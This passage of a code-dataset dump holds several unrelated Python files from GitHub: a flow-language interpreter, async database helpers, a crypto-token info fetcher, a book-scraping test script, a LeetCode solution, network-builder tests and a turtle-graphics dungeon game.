dst[\"sources\"].append(src_id)\n\n # we need to connect its internal exit nodes to its targets\n for k, v in sf[\"__internal__\"][\"exits\"].items():\n for src_id in v:\n src = flow[src_id]\n src[\"targets\"][k].remove(sf[\"id\"])\n for dst_id in sf[\"targets\"][k]:\n dst = flow[dst_id]\n dst[\"sources\"].remove(sf[\"id\"])\n dst[\"sources\"].append(src_id)\n src[\"targets\"][k].append(dst_id)\n\n # we need to change the scope for all its internal nodes\n # to the parent scope\n cur_scope = sf[\"id\"]\n par_scope = sf[\"scope\"]\n for v in flow.values():\n if v[\"scope\"] == cur_scope:\n v[\"scope\"] = par_scope\n\n # now the subflow node is no longer needed,\n # since all its internals have been resolved\n flow.pop(sf[\"id\"])\n\n # if all subflows have been resolved\n # every node is now in the global scope,\n # and has a unique ID to distinguish itself\n for k, v in flow.items():\n assert v.pop(\"scope\") == \"__global__\"\n v.pop(\"name\")\n # source information is now redundant, because\n # targets define the entire flow anyway\n v.pop(\"sources\")\n return flow\n\n\ndef include_file(filename, env):\n assert filename.startswith('\"') and filename.endswith(\n '\"'\n ), \"Filename needs to be a double-quoted string\"\n filename = filename.replace('\"', \"\")\n globl = env.find(\"+\")\n is_internal, fullname = check_internal_dir(filename)\n\n if is_internal:\n localname = filename\n else:\n localname = None\n\n if filename not in env.includes:\n from flatland.lang.run import main as runner\n\n with open(fullname) as f:\n subprogram = f.read()\n\n t = CONFIG.RUN\n CONFIG.RUN = False\n runner(subprogram, filename, globl, localname)\n CONFIG.RUN = t\n\n\ndef standard_env() -> Env:\n \"An environment with some Scheme standard procedures.\"\n env = Env()\n env.name = \"__global__\"\n env.seed = datetime.now()\n env.includes = set()\n random.seed(env.seed)\n env.update(vars(math)) # sin, cos, sqrt, pi, ...\n env.update(\n {\n \"+\": op.add,\n \"-\": op.sub,\n \"*\": op.mul,\n \"/\": op.truediv,\n \"%\": op.mod,\n \"=\": op.eq,\n \">\": op.gt,\n \"<\": op.lt,\n \">=\": op.ge,\n \"<=\": op.le,\n \"begin\": lambda *x: x[-1],\n \"abs\": abs,\n \"apply\": lambda proc, args: proc(*args),\n \"expt\": pow,\n \"map\": map,\n \"max\": max,\n \"min\": min,\n \"not\": op.not_,\n \"null?\": lambda x: x == [],\n \"number?\": lambda x: isinstance(x, Number),\n \"print\": print,\n \"procedure?\": callable,\n \"round\": round,\n \"symbol?\": lambda x: isinstance(x, Symbol),\n \"randint\": random.randint,\n }\n )\n return env\n\n\ndef evalf(x, env): # noqa: C901\n \"Evaluate an expression in an environment.\"\n if isinstance(x, Symbol): # variable reference\n return env.find(x)[x]\n elif not isinstance(x, List): # constant\n return x\n if len(x) == 0:\n return\n op, *args = x\n if op == \"quote\": # quotation\n return args[0]\n elif op == \"#include\":\n filename = args[0]\n include_file(filename, env)\n elif op == \"if\": # conditional\n (test, conseq, alt) = args\n exp = conseq if evalf(test, env) else alt\n return evalf(exp, env)\n elif op == \"create-node\":\n name, tp, *tpargs = args\n node = node_creator(env, name, tp, *tpargs)\n env[name] = node\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List([op, name, tp, *node.parameters])\n x.clear()\n x.extend(x2)\n elif op == \"define-flow\":\n tp, params, randoms, body = args\n filename = env.find(\"__file__\")[\"__file__\"]\n rddict = dict()\n for rdp in randoms:\n parname, (rfunc, rparams) = rdp\n rparams = [evalf(bd, env) for bd in rparams]\n rddict[parname] = (rfunc, rparams)\n env[tp] = FlowCreator(tp, params, rddict, body, filename)\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List([op, tp, params, List(), body])\n x.clear()\n x.extend(x2)\n\n elif op == \"create-entry\":\n node = args[0]\n env[\"__internal__\"].add_entry(node)\n env[node].sources.append(\"__internal__\")\n elif op == \"create-exit\":\n np, *ports = args\n create_exit(env, np, ports)\n elif op == \"create-link\":\n fnp, tnp = args\n link_creator(env, fnp, tnp)\n elif op == \"run-flow\":\n flowname, *rest = args\n flow, start = run_flow(env, flowname, rest)\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List(\n [\n op,\n flowname,\n List(flow.parameters),\n start[\"params\"][\"position\"],\n start[\"params\"][\"theta\"],\n ]\n )\n x.clear()\n x.extend(x2)\n return format_static(flow, start)\n elif op == \"define\": # definition\n (symbol, exp) = args\n env[symbol] = evalf(exp, env)\n elif op == \"set\": # assignment\n (symbol, exp) = args\n env.find(symbol)[symbol] = evalf(exp, env)\n elif op == \"lambda\": # procedure\n (parms, body) = args\n return Procedure(parms, body, env)\n else: # procedure call\n proc = evalf(op, env)\n vals = [evalf(arg, env) for arg in args]\n answer = proc(*vals)\n return answer\n","repo_name":"mayahq/flatland","sub_path":"src/flatland/lang/primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7098161015","text":"import asyncio\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy import select\nfrom .models import Claims\n\nasync def claimed(user_id, db):\n async with db.AsyncSession() as session:\n claim = await session.execute(\n select(Claims).filter(Claims.user_id == user_id)\n )\n if claim:\n return claim.scalar_one_or_none()\n return False\n\nasync def add_claim(user_id, claim_data, db):\n async with db.AsyncSession() as session:\n claim = Claims(**claim_data, user_id=user_id)\n session.add(claim)\n await session.commit()\n await session.refresh(claim)\n return claim\n\nasync def change_state(user_id, db):\n async with db.AsyncSession() as session:\n claim = await session.execute(\n select(Claims).filter(Claims.user_id == user_id).first()\n )\n if claim:\n claim = claim.scalar()\n claim.claimed = not claim.claimed\n await session.commit()\n await session.refresh(claim)\n return claim\n return None\n","repo_name":"WajahatAliKK/EthDistributionBot","sub_path":"database/claim_functions.py","file_name":"claim_functions.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7101095805","text":"\nimport requests, json\nfrom bot.utils.config import ETHERSCAN_API, BSCSCAN_API, ARBISCAN_API, WETH_ADDRESS, WBNB_ADDRESS, WETH_ADDRESS_ARB\nfrom bot.uniswap_utils import uniswap_base, pancakeswap_base, sushiswap_base\nfrom datetime import datetime\nfrom database.models import Coin\nimport concurrent.futures\n\nNETWORK_TOKEN_MAPPING = {\n \"ethereum\": \"WETH\",\n \"bsc\": \"WBNB\",\n \"arbitrum\": \"WETH\",\n}\n\nimport requests\n\nNETWORK_TOKEN_MAPPING = {\n \"ethereum\": \"WETH\",\n \"bsc\": \"WBNB\",\n \"arbitrum\": \"WETH\",\n}\n\ndef fetch_token_info(contract_address):\n try:\n response = requests.get(f'https://api.dexscreener.com/latest/dex/tokens/{contract_address}')\n response.raise_for_status()\n data = response.json()\n pair = None\n # Filter pairs by network and matching quoteToken symbol\n \n for pair1 in data.get('pairs', []):\n \n if pair1.get('quoteToken', {}).get('symbol') in [\"WETH\",\"WBNB\"]:\n pair = pair1\n break\n elif pair1.get('baseToken', {}).get('symbol') in [\"WETH\",\"WBNB\"] and pair1.get('quoteToken', {}).get('address').lower() == contract_address.lower() :\n pair = pair1\n pair['baseToken'],pair['quoteToken'] = pair['quoteToken'], pair['baseToken']\n pair['priceNative'] = 1/float(pair['priceNative'])\n pair['priceUsd'] = 1/float(pair['priceUsd'])\n break\n # Extract necessary details\n if not pair:\n for pair1 in data.get('pairs', []):\n if pair1.get('baseToken', {}).get('address').lower() == contract_address.lower():\n pair = pair1\n break\n if pair:\n token_info = {\n \"contract_address\": contract_address,\n \"name\": pair.get('baseToken', {}).get('name'),\n \"symbol\": pair.get('baseToken', {}).get('symbol'),\n \"quote_symbol\": pair.get('quoteToken', {}).get('symbol'),\n \"quote_address\": pair.get('quoteToken', {}).get('address'),\n \"liquidity\": pair.get('liquidity', {}).get('quote'), # liquidity in quote currency\n \"market_cap\": pair.get('liquidity', {}).get('usd'),\n \"pair_address\": pair.get('pairAddress'), # pair address\n \"created_at\": pair.get('pairCreatedAt'),\n \"chart_url\" : pair.get('url'),\n 'price': pair.get('priceNative'),\n 'price_usd': pair.get('priceUsd'),\n 'network': pair.get('chainId'),\n 'dex': pair.get('dexId'),\n 'dexscreener': True\n }\n if token_info['created_at']:\n timestamp_s = int(token_info['created_at'])/1000\n token_info['created_at'] = datetime.utcfromtimestamp(timestamp_s)\n \n return token_info\n return None\n except Exception as e:\n print(f\"Error while fetching token info: {e}\")\n return None\n\n\ndef to_check_sum(contract_address):\n return uniswap_base.web3.to_checksum_address(contract_address)\n\n\ndef generate_message(coin: Coin, tracking, balance):\n unit_map = {\n \"ethereum\": \"ETH\",\n \"bsc\": \"BNB\",\n \"arbitrum\": \"ETH\",\n }\n\n unit = unit_map.get(coin.network, \"ETH\")\n address = \"etherscan.io\" if coin.network==\"ethereum\" else (\"bscscan.com\" if coin.network==\"bsc\" else \"arbiscan.io\")\n \n message = (\n f\"🔍 Tracking | {'✅' if tracking else '❌'}\\n\"\n f\"🪙 {coin.name.strip()} (#{coin.symbol}) 🔗 {unit} Token\\n\"\n f\"[CA](https://{address}/token/{coin.contract_address}): `{coin.contract_address}`\\n\"\n f\"[LP](https://{address}/token/{coin.lp_address}): `{coin.lp_address}`\\n\"\n f\"💰 Balance | {balance} {coin.symbol}\\n\"\n f\"💧 Liquidity | {coin.liquidity} W{unit}\\n\"\n f\"🧢 Market Cap | ${coin.market_cap}\\n\"\n f\"-MC/Liq: {round(coin.market_cap/coin.liquidity,2) if coin.liquidity>0 else 0}\\n\"\n f\"-Max Wallet: {coin.max_wallet_amount if coin.max_wallet_amount >0 else 100}% Ξ {0.01*coin.max_wallet_amount*coin.totalSupply if coin.max_wallet_amount>0 else ''} {coin.symbol if coin.max_wallet_amount>0 else ''}\\n\"\n f\"⚖️ Taxes | 🅑 {round(float(coin.buy_tax)*100,1)}% 🅢 {round(float(coin.sell_tax)*100,1)}%\\n\"\n f\"⚠️ Honeypot | {'Yes' if coin.is_honeypot else 'No'}\\n\"\n )\n return message\n\n\n\n\ndef get_token_abi(contract_address, network):\n if network==\"ethereum\":\n url = f\"https://api.etherscan.io/api?module=contract&action=getabi&address={contract_address}&apikey={ETHERSCAN_API}\"\n elif network==\"bsc\":\n url = f\"https://api.bscscan.com/api?module=contract&action=getabi&address={contract_address}&apikey={BSCSCAN_API}\"\n else:\n url = f\"https://api.arbiscan.io/api?module=contract&action=getabi&address={contract_address}&apikey={ARBISCAN_API}\"\n try:\n abi = requests.get(url).content\n abi = json.loads(abi).get('result',{})\n if abi:\n abi = json.loads(abi)\n return abi\n \n except:\n return {}\n\ndef find_relevant_function_names_from_abi(abi):\n function_names = []\n for item in abi:\n if item['type'] == 'function' and item['stateMutability'] in ['view', 'pure'] and not item['inputs']:\n function_name = item['name'].lower() # convert to lowercase for comparison\n if any(substring in function_name for substring in [\"buy\", \"sell\", \"buyer\", \"seller\", \"fee\", \"maxwallet\"]):\n function_names.append(item['name'])\n return function_names \n\ndef call_contract_function(contract, function_name):\n function_to_call = getattr(contract.functions, function_name)\n result = function_to_call().call()\n return result\n\n\n\ndef get_security_info(contract_address, network, d):\n if network==\"ethereum\":\n nid = 1\n elif network==\"bsc\":\n nid = 56\n else:\n nid = 42161\n url = f\"https://api.gopluslabs.io/api/v1/token_security/{str(nid)}?contract_addresses={contract_address}\"\n response = requests.get(url)\n response.raise_for_status()\n data = response.json()\n \n data = data.get('result').get(contract_address.lower())\n \n if data:\n d['buy_tax'] = data.get(\"buy_tax\",0)\n d['sell_tax'] = data.get(\"sell_tax\",0)\n d['sell_limit'] = True if data.get(\"cannot_sell_all\",0) == \"1\" else False\n d['anti_whale'] = True if data.get(\"is_anti_whale\",0) == \"1\" else False\n d['is_honeypot'] = True if data.get(\"is_honeypot\",0) == \"1\" else False\n d['is_blacklisted'] = True if data.get(\"is_blacklisted\",0) == \"1\" else False\n return d\n\n\n\ndef fetch_data(contract_address, quote_symbol, quote, network, dex, base):\n try:\n data = {\n 'pair_address': base.get_v2_pair_address(contract_address, quote),\n 'contract_address': contract_address,\n 'name': base.web3.eth.contract(contract_address, abi=base.erc20_abi).functions.name().call(),\n 'symbol': base.web3.eth.contract(contract_address, abi=base.erc20_abi).functions.symbol().call(),\n 'network': network,\n 'dex': dex,\n 'quote_symbol': quote_symbol,\n 'quote_address': quote\n }\n except:\n return None\n return data\n\ndef find_max_wallet(fn, token_contract):\n try:\n if 'max' in fn.lower() and 'wallet' in fn.lower():\n return call_contract_function(token_contract, fn)\n except:\n pass\n return None\n\n# def process_erc20_token(contract_address, network):\n# base_list = [('WETH', WETH_ADDRESS, 'ethereum', 'uniswap', uniswap_base),\n# ('WBNB', WBNB_ADDRESS, 'bsc', 'pancakeswap', pancakeswap_base),\n# ('WETH', WETH_ADDRESS_ARB, 'arbitrum', 'sushiswap', sushiswap_base)]\n\n# data = fetch_token_info(contract_address)\n# if not data:\n# with concurrent.futures.ThreadPoolExecutor() as executor:\n# futures = [executor.submit(fetch_data, contract_address, *base) for base in base_list]\n# for future in concurrent.futures.as_completed(futures):\n# data = future.result()\n# if data:\n# break\n\n# network = data.get('network')\n# abi = get_token_abi(contract_address, network)\n\n# if not abi or \"decimal\" not in str(abi):\n# abi = base_list[0][4].erc20_abi # Using Uniswap's abi as default.\n\n# web3_map = {base_list[i][2]: base_list[i][4].web3 for i in range(3)}\n# token_contract = web3_map.get(network, base_list[2][4].web3).eth.contract(contract_address, abi=abi)\n\n# decimals = token_contract.functions.decimals().call()\n# total_supply = token_contract.functions.totalSupply().call()\n\n# list_of_funcs = find_relevant_function_names_from_abi(abi)\n\n# max_wallet = 0\n# with concurrent.futures.ThreadPoolExecutor() as executor:\n# futures = [executor.submit(find_max_wallet, fn, token_contract) for fn in list_of_funcs]\n# for future in concurrent.futures.as_completed(futures):\n# result = future.result()\n# if result:\n# max_wallet = result\n# break\n\n# data.update({\n# 'decimals': decimals,\n# 'total_supply': int(total_supply/(10**decimals)),\n# 'maxWallet': max_wallet,\n# 'network': network,\n# 'maxWallet_perc': 100*max_wallet/total_supply\n# })\n# try:\n# data = get_security_info(contract_address, network, data)\n# except Exception as e:\n# pass\n\n# return data\n\ndef process_erc20_token(contract_address, network):\n \n try:\n data = fetch_token_info(contract_address)\n except Exception as e:\n print(e)\n data = {}\n \n \n if data:\n \n network = data['network']\n \n try:\n abi = get_token_abi(contract_address, network)\n except Exception as e:\n print(e)\n abi = None\n if not abi:\n abi = uniswap_base.erc20_abi\n elif \"decimal\" not in str(abi):\n abi = uniswap_base.erc20_abi\n if network==\"ethereum\":\n token_contract = uniswap_base.web3.eth.contract(contract_address, abi=abi)\n elif network==\"bsc\":\n \n token_contract = pancakeswap_base.web3.eth.contract(contract_address, abi=abi)\n else:\n token_contract = sushiswap_base.web3.eth.contract(contract_address, abi=abi)\n decimals = token_contract.functions.decimals().call()\n total_supply = (token_contract.functions.totalSupply().call())\n else:\n \n abi = uniswap_base.erc20_abi\n \n data = {'contract_address':contract_address}\n for i,base in enumerate([uniswap_base,pancakeswap_base,sushiswap_base]):\n try:\n if i==0:\n quote_symbol = \"WETH\"\n quote = WETH_ADDRESS\n network = \"ethereum\"\n dex = \"uniswap\"\n elif i==1:\n quote_symbol = \"WBNB\"\n quote= WBNB_ADDRESS\n network = \"bsc\"\n dex = \"pancakeswap\"\n else:\n quote_symbol = \"WETH\"\n quote = WETH_ADDRESS_ARB\n network = \"arbitrum\"\n dex = \"sushiswap\"\n data['pair_address'] = base.get_v2_pair_address(contract_address, quote)\n token_contract = base.web3.eth.contract(contract_address, abi=abi)\n decimals = token_contract.functions.decimals().call()\n total_supply = (token_contract.functions.totalSupply().call())\n data['name'] = token_contract.functions.name().call()\n data['symbol'] = token_contract.functions.symbol().call()\n data['network'] = network\n data['dex'] = dex\n\n data['dexscreener'] = False\n data['quote_symbol'] = quote_symbol\n data['quote_address'] = quote\n break\n except:\n continue\n \n \n\n list_of_funcs = find_relevant_function_names_from_abi(abi)\n \n maxWallet = 0\n for fn in list_of_funcs:\n if 'max' in fn.lower() and 'wallet' in fn.lower():\n try:\n maxWallet = call_contract_function(token_contract, fn)\n break\n except Exception as e:\n pass\n \n \n\n # if data:\n data['decimals'] = decimals\n data['total_supply'] = int(total_supply/(10**decimals))\n data['maxWallet'] = maxWallet\n data['maxWallet_perc'] = 100*maxWallet/total_supply\n try:\n data = get_security_info(contract_address, network, data)\n except Exception as e:\n pass\n \n return data\n\n","repo_name":"WajahatAliKK/CopyTrading","sub_path":"bot/utils/ca_helpers.py","file_name":"ca_helpers.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28413435873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 22 12:02:58 2023\n\n@author: Kaitlin\n\nRuns test cases for the \n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport Storygraph_Extraction_v3 as SE\n\ndef check_book_details(book):\n print(\"input: \",book)\n link = SE.get_SGLink(book)\n page = requests.get(link)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(link)\n\n book_type, genre = SE.get_genre(soup)\n print(book_type,genre)\n mood = SE.get_mood(soup)\n print(mood)\n pacing = SE.get_pacing(soup)\n print(pacing)\n book_len = SE.get_book_len(soup)\n print(book_len)\n\n book_date = SE.get_book_date(soup)\n print(book_date)\n\n author = SE.get_author(soup)\n print(author)\n series = SE.get_series(soup)\n print(series)\n return\n\n\n\n# This block is a test case for the functions in the imported file\n\nbook1 = \"book\" # random novel essentially it happens to pull Book Lovers as of Jan 2023\nbook2 = \"The Calculating Stars\" # Specific novel in a series\nbook3 = \"Artemis (Andy Weir)\"\nbook4 = \"Impostors (Scott Westerfeld)\"\nbook5 = \"The Hobbit, or There and Back Again\" # Have to put the full book name unless there's a subtitle with a colon\nbook6 = \"Impostors 1\" # Proves it doesn't break with some of the details missing\nbook7 = \"Bad Advice\"\n\n\ncheck_book_details(book1)\ncheck_book_details(book2)\ncheck_book_details(book3)\ncheck_book_details(book4)\ncheck_book_details(book5)\ncheck_book_details(book6)\ncheck_book_details(book7)\n","repo_name":"kmmcelro/Book_Data_Analysis","sub_path":"SE_tests.py","file_name":"SE_tests.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17381041101","text":"\"\"\"\nA strobogrammatic number is a number that looks the same when rotated 180 degrees (looked at upside down).\n\nWrite a function to determine if a number is strobogrammatic. The number is represented as a string.\n\nFor example, the numbers \"69\", \"88\", and \"818\" are all strobogrammatic.\n\"\"\"\n\n\"\"\"Solution:\n 1. create dictionary\n 2. using stack to match\n\"\"\"\n\nclass Solution(object):\n def isStrobogrammatic(self, num):\n \"\"\"\n :type num: str\n :rtype: bool\n \"\"\"\n diction = {'0':'0', '1':'1', '6':'9', '8':'8', '9':'6'}\n left, right = 0, len(num)-1\n while left <= right:\n # Error 1: remember to check if key exist\n key = num[left]\n if key not in diction or diction[key] != num[right]:\n return False\n left += 1\n right -= 1\n return True\n","repo_name":"bwang8482/LeetCode","sub_path":"Google/246_Strobogrammatic_Number.py","file_name":"246_Strobogrammatic_Number.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70109032516","text":"import pandas as pd\nfrom src.logic.network import NetworkBuilder\n\nnetwork_builder = NetworkBuilder()\n\n\ndef test_builder_can_correctly_split_strings():\n corpus = [\n \"#this is an #example of a tweet\\n\\nI want this to be split-well!\",\n \"Another #example of a #corpus #entry!! LOL\",\n ]\n result = pd.Series(\n [\n [\n \"#this\",\n \"is\",\n \"an\",\n \"#example\",\n \"of\",\n \"a\",\n \"tweet\",\n \"I\",\n \"want\",\n \"this\",\n \"to\",\n \"be\",\n \"split\",\n \"well\",\n ],\n [\"Another\", \"#example\", \"of\", \"a\", \"#corpus\", \"#entry\", \"LOL\"],\n ],\n name=\"corpus\",\n )\n network_builder.load_clean_corpus(corpus)\n assert (result == network_builder.data[\"corpus\"]).all()\n\n\ndef test_builder_can_correctly_extract_hashtags():\n corpus = [\n \"#this is an #example of a tweet\\n\\nI want this to be split-well!\",\n \"Another #example... of a #corpus #entry!! LOL\",\n ]\n result = pd.Series(\n [[\"#this\", \"#example\"], [\"#example\", \"#corpus\", \"#entry\"]], name=\"keyword\"\n )\n network_builder._extract_from_corpus(by=\"hashtag\")\n\n assert (result == network_builder.data[\"keyword\"]).all()\n","repo_name":"arabinelli/twitter-semantic-graph-backend","sub_path":"test/test_network_builder.py","file_name":"test_network_builder.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73714756674","text":"# Text based Dungeons and Dragons game\n\n# --------------ATTRIBUTE DEFINITION------------------------------------------------------------------------------------\n# health: low 250 - 3500 high\n# armour: (armour value regarding health point protection/ dmg mitigation) 0-100\n# weapon: (weapon description) string -> maybe weapon specific attributes\n# dmg: (damage per hit) will be a range and maybe light and heavy attacks (30% stronger but hight dodge chance for enemy)\n# agility: (ability to dodge attacks/debuffs) in %\n# charisma: (ability to convince and lead) 0 - 10\n# --------------------- PERSONAS ---------------------------------------------------------------------------------------\n# Narrator - provides verbal Feedback of the game progress, fight progression, environment etc.\n# class names - provides verbal Feedback for it's own persona\n# -------------------- ATTACKS -----------------------------------------------------------------------------------------\n# light dmg: 2/3 of heavy\n# heavy dmg: reference\n# crit dmg: double\n\n# ------------------- IMPORTS --------------------------------------\nimport random\nimport time\nimport turtle\nimport tkinter\n\n\n# ------------------------------------------------------------------\n\n# chance to break armour / mitigation in regards to attack type\n\ndef init_attack(hero, npc, pen_object): # takes the object names\n\n #### INPUT listener -> key for light attack and so on\n print(\"--------------ENCOUNTER---------------\")\n print(str(hero.name) + \" VS \" + str(npc.__class__.__name__))\n attacker_attacks = hero.attacks()\n defender_attacks = npc.attacks()\n init_hero_pos = hero.position()\n init_npc_pos = npc.position()\n pen_object_shape = pen_object.shape()\n hero.up()\n hero.setheading(0)\n npc.up()\n npc.setheading(180)\n pen_object.color(\"white\")\n pen_object.up()\n\n\n dmg_pos = (0, 200)\n hit_pos = (0, 170)\n dodge_pos = (0, 140)\n crit_pos = (0, 110)\n pen_object.setpos(dmg_pos)\n\n order = [hero, npc]\n\n if npc.agility >= hero.agility:\n order = list(reversed(order)) # reverse provides a reversed iterator, not a reversed list! -> list()\n\n round_counter = 0\n while hero.health and npc.health > 0:\n round_counter += 1\n print(\"Round {}: {} attacks {}\".format(round_counter, order[0].name, order[1].name))\n if order[0].__class__.__name__ in Setup.char_list: # check if it's the turn of the hero or the npc\n print(\"Narrator: Choose your action: \")\n for i, attack in enumerate(order[0].attacks()):\n print(\"{}. {}\".format(int(i + 1), attack[0]))\n print(\"{}. Try to escape\".format(i + 2))\n\n while True:\n action = input(\"Enter the chosen number: \")\n if action.isdigit() and int(action) in list(range(1, len(order[0].attacks())+1)):\n break\n else:\n print(\"Please enter a valid number\")\n if int(action) != i + 2:\n result_tuple = order[1].getAttacked(order[0].attacks()[int(action) - 1], pen_object)\n print(\"-------------------------------\")\n elif int(action) == i + 2: # handling escape action\n pass\n\n else:\n action = random.randint(0, 1)\n result_tuple = order[1].getAttacked(order[0].attacks()[int(action)], pen_object)\n print(\"-------------------------------\")\n # Attack movement\n order[0].fd(500)\n time.sleep(0.2)\n order[0].bk(500)\n\n if result_tuple[0] == False:\n pen_object.setpos(hit_pos)\n pen_object.write(\"MISS\", font=(\"Arial\", 30, \"normal\"))\n elif result_tuple[1] == True:\n pen_object.setpos(dodge_pos)\n pen_object.write(\"DODGED\", font=(\"Arial\", 30, \"normal\"))\n elif result_tuple[3] != None:\n pen_object.setpos(dmg_pos)\n pen_object.write(str(round(result_tuple[3])), font=(\"Arial\", 30, \"normal\"))\n\n if result_tuple[2] == True:\n pen_object.color(\"red\")\n pen_object.setpos(crit_pos)\n pen_object.write(\"CRITICAL HIT!\", font=(\"Arial\", 30, \"normal\"))\n pen_object.color(\"white\")\n\n\n if result_tuple[4] == True: #set armour break symbol\n pen_object.ht()\n pen_object.setpos(order[1].position()[0], order[1].position()[1]+100)\n pen_object.st()\n pen_object.shape(\"armour_break_status.gif\")\n pen_object.stamp()\n pen_object.ht()\n\n if hero.health <= 0:\n screen.done()\n pass\n\n time.sleep(2)\n pen_object.clear()\n pen_object.shape(pen_object_shape)\n order = list(reversed(order))\n\n if npc.health <= 0:\n for i in range(5):\n npc.ht()\n time.sleep(0.15)\n npc.st()\n time.sleep(0.15)\n npc.ht()\n Draw.redraw(object_handler.current_screens[0], False)\n object_handler.current_screens[0].bgcolor(\"green\")\n hero.shape(\"classic\")\n hero.setpos(Move.hero_pos_before_enc[0], Move.hero_pos_before_enc[1])\n Move.encounter = False\n\n# --------------------------------------------------------------\nclass Draw: # building of a 2D array (map) with every tile having specific attributes (enemies, forest, plain, etc.)\n\n pen = turtle.Turtle() # turtle for drawing\n list_tree = []\n list_grass = []\n list_potions = {} # stamp_id and print location\n kill_display_pos = (-320, 180)\n font_size = 40\n\n @staticmethod\n def tree(pen):\n circle_size = 40\n circle_color = \"#32A962\"\n pen.color(\"brown\", \"brown\")\n pen.pensize(4)\n pen.fd(20)\n pen.up()\n pen.bk(10)\n pen.down()\n pen.left(90)\n pen.fd(65)\n pos = pen.position()\n\n pen.up()\n pen.setpos(int(pos[0]) - random.randint(2, 8), int(pos[1]) - random.randint(17, 23))\n pen.down()\n pen.dot(circle_size, circle_color)\n\n pen.up()\n pen.setpos(int(pos[0]) + random.randint(2, 8), int(pos[1]) - random.randint(17, 23))\n pen.down()\n pen.dot(circle_size, circle_color)\n\n pen.up()\n pen.setpos(int(pos[0]) - random.randint(-1, 6), int(pos[1]) + random.randint(-2, 2))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.setpos(int(pos[0]) + random.randint(0, 6), int(pos[1]) + random.randint(-2, 2))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.setpos(int(pos[0] + random.randint(-2, 2)), int(pos[1]) + random.randint(2, 8))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.right(90)\n\n @staticmethod\n def grass(pen):\n start_pos = pen.position()\n pen.color(\"#8AFFB9\", \"#8AFFB9\")\n pen.pensize(5)\n pen.setheading(90)\n pen.circle(10, 100)\n pen.up()\n pen.setpos(start_pos)\n pen.down()\n pen.setheading(90)\n pen.fd(15)\n pen.up()\n pen.setpos(start_pos)\n pen.down()\n pen.setheading(90)\n pen.circle(-10, 100)\n pen.setheading(0)\n\n @classmethod\n def potion(cls, pen):\n potion_location = pen.position()\n pen.pensize(15)\n pen.color(\"#980000\", \"#D44A4A\")\n stamp_ID = pen.stamp()\n cls.list_potions[stamp_ID] = potion_location\n\n # print letters HP\n pen.up()\n pen.setpos(potion_location[0] - 5, potion_location[1] - 8)\n pen.down()\n text = \"HP\"\n pen.pencolor(\"white\")\n pen.write(text)\n return cls.list_potions\n\n @classmethod\n def redraw(cls, canvas, encounter):\n print(\"Redrawing...\")\n pen = cls.pen\n t = canvas.tracer()\n canvas.tracer(0, 0) # turns off turtle animation\n pen.clear()\n\n if encounter == False:\n\n pen.up()\n pen.setpos(-350, -250)\n pen.down()\n pen.color(\"Black\")\n for border in range(2):\n pen.fd(700)\n pen.left(90)\n pen.fd(500)\n pen.left(90)\n\n for grass in cls.list_grass:\n pen.up()\n pen.setpos(grass[0], grass[1])\n pen.down()\n cls.grass(pen)\n\n for tree in cls.list_tree:\n pen.up()\n pen.setpos(tree[0], tree[1])\n pen.down()\n cls.tree(pen)\n\n for key in list(cls.list_potions):\n pen.up()\n pos = cls.list_potions[key]\n pen.setpos(pos[0], pos[1])\n pen.down()\n cls.potion(pen)\n del cls.list_potions[key]\n cls.kill_display()\n canvas.update()\n canvas.tracer(t, 0)\n\n else:\n cls.encounter(encounter, canvas, t)\n\n @classmethod\n def environment(cls, canvas): # canvas is passed screen object, draws map\n print(\"Draw environment\")\n cls.list_tree = []\n cls.list_grass = []\n cls.list_potions = {}\n pen = cls.pen\n # pen = object_handler.current_heros[0] <- actual code\n pen.speed(0) # highest speed\n t = canvas.tracer()\n canvas.tracer(0, 0) # turns off turtle animation\n pen.shape(\"circle\")\n pen.pensize(10)\n pen.up()\n pen.setpos(-350, -250)\n pen.down()\n\n for border in range(2):\n pen.fd(700)\n pen.left(90)\n pen.fd(500)\n pen.left(90)\n\n for grass in range(random.randint(90, 120)):\n # print(\"Printing grass\")\n pen.up()\n grass_pos = (random.uniform(-325, 325), random.uniform(-240, 232))\n cls.list_grass.append(grass_pos)\n pen.setpos(grass_pos[0], grass_pos[1])\n pen.down()\n Draw.grass(pen)\n\n for tree in range(random.randint(10, 15)):\n # print(\"Printing trees\")\n pen.up()\n tree_pos = (random.uniform(-325, 325), random.uniform(-240, 232))\n cls.list_tree.append(tree_pos)\n pen.setpos(tree_pos[0], tree_pos[1])\n pen.down()\n Draw.tree(pen)\n\n for potion in range(3):\n pen.up()\n pen.setpos(random.uniform(-325, 325), random.uniform(-240, 232))\n pen.down()\n cls.list_potions = cls.potion(pen)\n print(str(cls.list_potions))\n\n pen.ht()\n\n cls.kill_display()\n\n canvas.update() # refreshes while tracer (animation turned off) was active\n canvas.tracer(t, 0) # back to original refresh rate\n\n @classmethod\n def encounter(cls, encounter, canvas, original_tracer):\n pen = cls.pen\n hero_startPos = (-300, -197)\n goblin_startPos = (300, -142)\n\n hero = object_handler.current_heros[0]\n hero.shape(\"pixel_knight.gif\")\n hero.up()\n hero.setpos(hero_startPos)\n\n goblin = 